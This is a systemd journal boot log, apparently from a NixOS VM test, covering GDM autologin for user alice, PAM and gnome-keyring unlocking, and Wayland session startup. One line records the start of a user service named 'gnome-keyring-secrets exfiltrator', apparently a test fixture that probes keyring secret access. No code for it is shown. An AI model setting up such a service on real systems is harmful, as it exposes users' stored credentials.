machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'PATH=/nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/bin:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state ACCREDITED
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: type wayland, program? no, seat seat0
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: session display mode set to new-vt
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'XDG_SESSION_TYPE=wayland'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to ACCOUNT_DETAILS_SAVED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: saving account details for user alice
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to SESSION_OPENED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'XDG_VTNR=2'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: pam_unix(gdm-autologin:session): session opened for user alice(uid=1000) by (uid=0)
machine # Aug 02 11:49:34 machine gdm-autologin][937]: pam_systemd(gdm-autologin:session): New sd-bus connection (system-bus-pam-systemd-937) opened.
machine # Aug 02 11:49:34 machine systemd[1]: Created slice Slice /user/1000.
machine # ░░ Subject: A start job for unit user-1000.slice has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit user-1000.slice has finished successfully.
machine # ░░
machine # ░░ The job identifier is 384.
machine # Aug 02 11:49:34 machine systemd[1]: Stopped target Host and Network Name Lookups.
machine # ░░ Subject: A stop job for unit nss-lookup.target has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-lookup.target has finished.
machine # ░░
machine # ░░ The job identifier is 541 and the job result is done.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Got SIGHUP, reloading.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping Host and Network Name Lookups...
machine # ░░ Subject: A stop job for unit nss-lookup.target has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-lookup.target has begun execution.
machine # ░░
machine # ░░ The job identifier is 541.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: No service file found in /etc/avahi/services.
machine # Aug 02 11:49:34 machine systemd[1]: Stopped target User and Group Name Lookups.
machine # ░░ Subject: A stop job for unit nss-user-lookup.target has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-user-lookup.target has finished.
machine # ░░
machine # ░░ The job identifier is 540 and the job result is done.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping User and Group Name Lookups...
machine # ░░ Subject: A stop job for unit nss-user-lookup.target has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-user-lookup.target has begun execution.
machine # ░░
machine # ░░ The job identifier is 540.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping Name Service Cache Daemon (nsncd)...
machine # ░░ Subject: A stop job for unit nscd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nscd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 461.
machine # Aug 02 11:49:34 machine systemd[1]: Starting User Runtime Directory /run/user/1000...
machine # ░░ Subject: A start job for unit user-runtime-dir@1000.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit user-runtime-dir@1000.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 383.
machine # Aug 02 11:49:34 machine systemd[1]: nscd.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit nscd.service has successfully entered the 'dead' state.
machine # Aug 02 11:49:34 machine systemd[1]: Stopped Name Service Cache Daemon (nsncd).
machine # ░░ Subject: A stop job for unit nscd.service has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nscd.service has finished.
machine # ░░
machine # ░░ The job identifier is 461 and the job result is done.
machine # Aug 02 11:49:34 machine systemd-logind[783]: New session 1 of user alice.
machine # ░░ Subject: A new session 1 has been created for user alice
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░ Documentation: sd-login(3)
machine # ░░
machine # ░░ A new session with the ID 1 has been created for the user alice.
machine # ░░
machine # ░░ The leading process of the session is 937.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Name Service Cache Daemon (nsncd)...
machine # ░░ Subject: A start job for unit nscd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 461.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Joining mDNS multicast group on interface ens3.IPv4 with address 10.0.2.15.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: New relevant interface ens3.IPv4 for mDNS.
machine # Aug 02 11:49:34 machine systemd[1]: Finished User Runtime Directory /run/user/1000.
machine # ░░ Subject: A start job for unit user-runtime-dir@1000.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit user-runtime-dir@1000.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 383.
machine # Aug 02 11:49:34 machine systemd[1]: Starting User Manager for UID 1000...
machine # ░░ Subject: A start job for unit user@1000.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit user@1000.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 542.
machine # Aug 02 11:49:35 machine (systemd)[995]: pam_unix(systemd-user:session): session opened for user alice(uid=1000) by (uid=0)
machine # Aug 02 11:49:35 machine nsncd[992]: Aug 02 11:49:35.025 INFO started, config: Config { ignored_request_types: {}, worker_count: 8, handoff_timeout: 3s }, path: "/var/run/nscd/socket"
machine # Aug 02 11:49:35 machine systemd[1]: Started Name Service Cache Daemon (nsncd).
machine # ░░ Subject: A start job for unit nscd.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 461.
machine # Aug 02 11:49:35 machine systemd[1]: Reached target Host and Network Name Lookups.
machine # ░░ Subject: A start job for unit nss-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 541.
machine # Aug 02 11:49:35 machine systemd[1]: Reached target User and Group Name Lookups.
machine # ░░ Subject: A start job for unit nss-user-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-user-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 540.
machine # Aug 02 11:49:35 machine systemd-logind[783]: New session 2 of user alice.
machine # ░░ Subject: A new session 2 has been created for user alice
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░ Documentation: sd-login(3)
machine # ░░
machine # ░░ A new session with the ID 2 has been created for the user alice.
machine # ░░
machine # ░░ The leading process of the session is 995.
machine # Aug 02 11:49:35 machine systemd[1]: Finished Network Manager Wait Online.
machine # ░░ Subject: A start job for unit NetworkManager-wait-online.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager-wait-online.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 79.
machine # Aug 02 11:49:35 machine systemd[1]: Reached target Network is Online.
machine # ░░ Subject: A start job for unit network-online.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-online.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 78.
machine # Aug 02 11:49:35 machine systemd[1]: Reached target Multi-User System.
machine # ░░ Subject: A start job for unit multi-user.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit multi-user.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 2.
machine # Aug 02 11:49:35 machine systemd[1]: Reached target Graphical Interface.
machine # ░░ Subject: A start job for unit graphical.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit graphical.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 1.
machine # Aug 02 11:49:35 machine systemd[995]: Queued start job for default target Main User Target.
machine # Aug 02 11:49:35 machine systemd[995]: Created slice User Application Slice.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 8.
machine # Aug 02 11:49:35 machine systemd[995]: Created slice User Core Session Slice.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 13.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Paths.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 5.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Timers.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 3.
machine # Aug 02 11:49:35 machine systemd[995]: Starting D-Bus User Message Bus Socket...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 7.
machine # Aug 02 11:49:35 machine systemd[995]: Listening on Sound System.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 10.
machine # Aug 02 11:49:35 machine systemd[995]: Listening on D-Bus User Message Bus Socket.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 7.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Sockets.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 6.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Basic System.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 2.
machine # Aug 02 11:49:35 machine systemd[1]: Started User Manager for UID 1000.
machine # ░░ Subject: A start job for unit user@1000.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit user@1000.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 542.
machine # Aug 02 11:49:35 machine systemd[995]: Starting D-Bus User Message Bus...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 12.
machine # Aug 02 11:49:35 machine systemd[1]: Started Session 1 of User alice.
machine # ░░ Subject: A start job for unit session-1.scope has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit session-1.scope has finished successfully.
machine # ░░
machine # ░░ The job identifier is 621.
machine # Aug 02 11:49:35 machine systemd[1]: Startup finished in 18.270s (kernel) + 3.349s (userspace) = 21.619s.
machine # ░░ Subject: System start-up is now complete
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ All system services necessary queued for starting at boot have been
machine # ░░ started. Note that this does not mean that the machine is now idle as services
machine # ░░ might still be busy with completing start-up.
machine # ░░
machine # ░░ Kernel start-up required 18270357 microseconds.
machine # ░░
machine # ░░ Initrd start-up required INITRD_USEC microseconds.
machine # ░░
machine # ░░ Userspace start-up required 3349110 microseconds.
machine # Aug 02 11:49:35 machine systemd[995]: Started gnome-keyring-secrets exfiltrator service.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 14.
machine # Aug 02 11:49:35 machine systemd[995]: Starting Run user-specific NixOS activation...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 11.
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called pam_sm_open_session
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called parse_args
machine # Aug 02 11:49:35 machine gdm-autologin][937]: gkr-pam: invalid option: debug
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called unlock_keyring
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called get_control_file
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called gkr_pam_client_run_operation
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called lookup_daemon
machine # Aug 02 11:49:35 machine gdm-autologin][937]: lookup_daemon: GKD_CONTROL_RESULT_NO_DAEMON /run/user/1000/keyring/control -- /run/user/1000/keyring/control
machine # Aug 02 11:49:35 machine gdm-autologin][937]: called start_daemon
machine # Aug 02 11:49:35 machine gdm-autologin][1034]: called setup_child
machine # Aug 02 11:49:35 machine gdm-autologin][937]: gkr-pam: gnome-keyring-daemon started properly
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state SESSION_OPENED
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Emitting 'session-opened' signal
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: start or jump to session
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Ignoring session (null) as requested
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: no matching sessions found
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: migrated: 0
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: type wayland, program? no, seat seat0
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: session has its display server, reusing our server for another login screen
machine # Aug 02 11:49:35 machine gdm[929]: GLib: setenv()/putenv() are not thread-safe and should not be used after threads are created
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Creating D-Bus server for worker for session
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: D-Bus server for workers listening on unix:path=/var/run/gdm/dbus/dbus-uM1EiBrf
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Creating D-Bus server for greeters and such for session (null) (0x1508080)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: D-Bus server for greeters listening on unix:path=/var/run/gdm/dbus/dbus-DMRSkiyY
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Setting display device: (null)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Created user session for user 0 on display /org/gnome/DisplayManager/Displays/21713776 (seat seat0)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: id: (null)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: seat id: (null)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: session class: greeter
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: initial: no
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: allow timed login: yes
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: local: yes
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: supported session types: (null)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: session class: user
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: seat id: seat0
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: session id: 1
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplayStore: Adding display /org/gnome/DisplayManager/Displays/22071152 to store
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: on_display_added: assertion 'GDM_IS_REMOTE_DISPLAY (display)' failed
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: on_display_removed: assertion 'GDM_IS_REMOTE_DISPLAY (display)' failed
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplayStore: Unreffing display: 0x14b5370
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: Disposing display
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmDisplay: Finalizing display: /org/gnome/DisplayManager/Displays/21713776
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Disposing session
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Closing session
machine # Aug 02 11:49:35 machine systemd[995]: Finished Run user-specific NixOS activation.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 11.
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Stopping all conversations
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Stopping all conversations except for gdm-autologin
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: type wayland, program? no, seat seat0
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: 'gnome.desktop' registers self
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: checking if file 'gnome.desktop' is wayland session: yes
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Session (null) bypasses Xsession wrapper script
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: getting desktop names for file 'gnome.desktop'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: type wayland, program? no, seat seat0
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'LANG=en_US.UTF-8'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'XDG_CURRENT_DESKTOP=GNOME'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'GDMSESSION=gnome'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'GDM_LANG=en_US.UTF-8'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'DESKTOP_SESSION=gnome'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'XDG_SESSION_DESKTOP=gnome'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: start program: /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session "/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/bin/gnome-session"
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to SESSION_STARTED
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: opening user session with program '/nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session'
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: jumping to VT 2
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: first setting graphics mode to prevent flicker
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: VT mode did not need to be fixed
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: Trying script /etc/gdm/PostLogin
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: script /etc/gdm/PostLogin not found; skipping
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: Trying script /etc/gdm/PostLogin/Default
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: script /etc/gdm/PostLogin/Default not found; skipping
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: no script found
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: Trying script /etc/gdm/PreSession
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: script /etc/gdm/PreSession not found; skipping
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: Trying script /etc/gdm/PreSession/Default
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: script /etc/gdm/PreSession/Default not found; skipping
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: no script found
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: session opened creating reply...
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state SESSION_STARTED
machine # Aug 02 11:49:35 machine gdm-autologin][937]: Gdm: GdmSession worker: watching pid 1046
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmLocalDisplayFactory: received VT change event
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmLocalDisplayFactory: VT changed from 1 to 2
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmLocalDisplayFactory: active VT is not initial VT, so ignoring
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Emitting 'session-started' signal with pid '1046'
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: session started 1046
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_user alice
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Writing login record
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_type USER_PROCESS
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_tv time 1722599375
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_pid 1046
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_host login screen
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_line seat0
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Writing wtmp session record to /var/log/wtmp
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Adding or updating utmp record for login
machine # Aug 02 11:49:35 machine gdm-autologin][1046]: GLib-GIO: _g_io_module_get_default: Found default implementation local (GLocalVfs) for ‘gio-vfs’
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: Gdm: Enabling debugging
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: Gdm: Running session message bus
machine # Aug 02 11:49:35 machine systemd[995]: Started D-Bus User Message Bus.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 12.
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: GLib-GIO: Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: Gdm: session message bus already running, not starting another one
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Main User Target.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 1.
machine # Aug 02 11:49:35 machine dbus-daemon[1031]: [session uid=1000 pid=1031] Successfully activated service 'org.freedesktop.systemd1'
machine # Aug 02 11:49:35 machine systemd[995]: Startup finished in 517ms.
machine # ░░ Subject: User manager start-up is now complete
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The user manager instance for user 1000 has been started. All services queued
machine # ░░ for starting have been started. Note that other services might still be starting
machine # ░░ up or be started at any later time.
machine # ░░
machine # ░░ Startup of the manager took 517178 microseconds.
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: Gdm: Running wayland session
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: GLib-GIO: Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmManager: trying to register new display
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmCommon: Found session 1 for PID 1046, using
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmSession: Setting display device: tty2
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_user alice
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Writing login record
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_type USER_PROCESS
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_tv time 1722599375
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_pid 1046
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_host tty2
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: using ut_line tty2
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Writing wtmp session record to /var/log/wtmp
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: Adding or updating utmp record for login
machine # Aug 02 11:49:35 machine gdm[929]: Gdm: GdmLocalDisplayFactory: display status changed: 2
machine # Aug 02 11:49:35 machine gdm-wayland-session[1046]: Gdm: gdm-wayland-session: Session will register itself
